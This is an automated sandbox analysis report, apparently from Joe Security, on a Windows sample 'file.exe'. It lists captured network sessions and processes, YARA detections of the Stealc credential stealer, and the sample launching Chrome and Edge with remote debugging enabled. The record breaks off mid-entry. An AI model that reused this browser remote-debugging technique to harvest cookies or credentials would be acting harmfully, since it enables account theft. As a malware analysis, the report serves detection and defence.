2024-11-13 19:39:47 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:47 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:47 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: 1deecc73-401e-0029-32d2-2c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193947Z-16547b76f7fj897nhC1DFWdwq40000000hag00000000xye5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:47 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	49919	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:48 UTC	515	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 26acaadc-e01e-0099-3ca2-34da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193948Z-1749fc9bdbd6szhxhC1DFW199s00000001bg00000000vd96 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-13 19:39:48 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.5	49922	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	192	OUT	GET /rules/rule702300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:48 UTC	538	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT ETag: "0x8DC582BDC13EFEF" x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193948Z-16547b76f7fxdzxghC1DFWmf7n0000000hm000000000wcy0 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:48 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.5	49923	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	192	OUT	GET /rules/rule703401v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:48 UTC	517	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: text/xml Content-Length: 1425 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6BD89A1" x-ms-request-id: 8f5c374f-101e-0046-61d2-2c91b0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193948Z-16547b76f7f67wxlhC1DFWah9w0000000hp00000000021sg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:48 UTC	1425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.5	49918	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-13 19:39:48 UTC	494	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: dd26f8ab-901e-0083-2da2-34bb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241113T193948Z-1749fc9bdbd2jxtthC1DFWfk5w00000001f0000000005n8u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:48 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	49931	13.107.246.57	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:49 UTC	536	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: 6a8e19b3-801e-0039-4da3-2c28a3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241113T193948Z-16547b76f7f9bs6dhC1DFWt3rg0000000hng0000000042c1 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:49 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	49927	13.107.246.57	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:49 UTC	536	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: 848dde1d-101e-005a-5fa3-2c6e86000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241113T193948Z-16547b76f7flf9g6hC1DFWmcx8000000085000000000b8rg Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:49 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
148	192.168.2.5	49930	13.107.246.57	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:49 UTC	536	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: 0d52236e-d01e-0008-0da9-357374000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241113T193948Z-1749fc9bdbdjjp8thC1DFWye6g00000001bg00000000k2kq Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:49 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
149	192.168.2.5	49929	13.107.246.57	443	7200	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-13 19:39:48 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-13 19:39:49 UTC	536	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:39:48 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: 93a3a18f-901e-004b-34a2-34599d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241113T193948Z-16547b76f7f2g4rlhC1DFWnx880000000heg00000000pkxm Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-13 19:39:49 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Target ID:	0
Start time:	14:39:15
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xd80000
File size:	1'799'168 bytes
MD5 hash:	F8D1D73A4B017AE508EE5172F7601906
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2672659024.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2174877121.0000000005310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2675026709.000000000153E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2672659024.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:39:25
Start date:	13/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:39:26
Start date:	13/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2532,i,4469706837044549514,10434759884212031154,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:39:35
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:39:36
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2296,i,5027876848785677956,9727409253048417299,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:39:36
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	14:39:36
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2800 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:39:40
Start date:	13/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6524 --field-trial-handle=2176,i,1134778302502361509,16392494172274893071,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:39:40
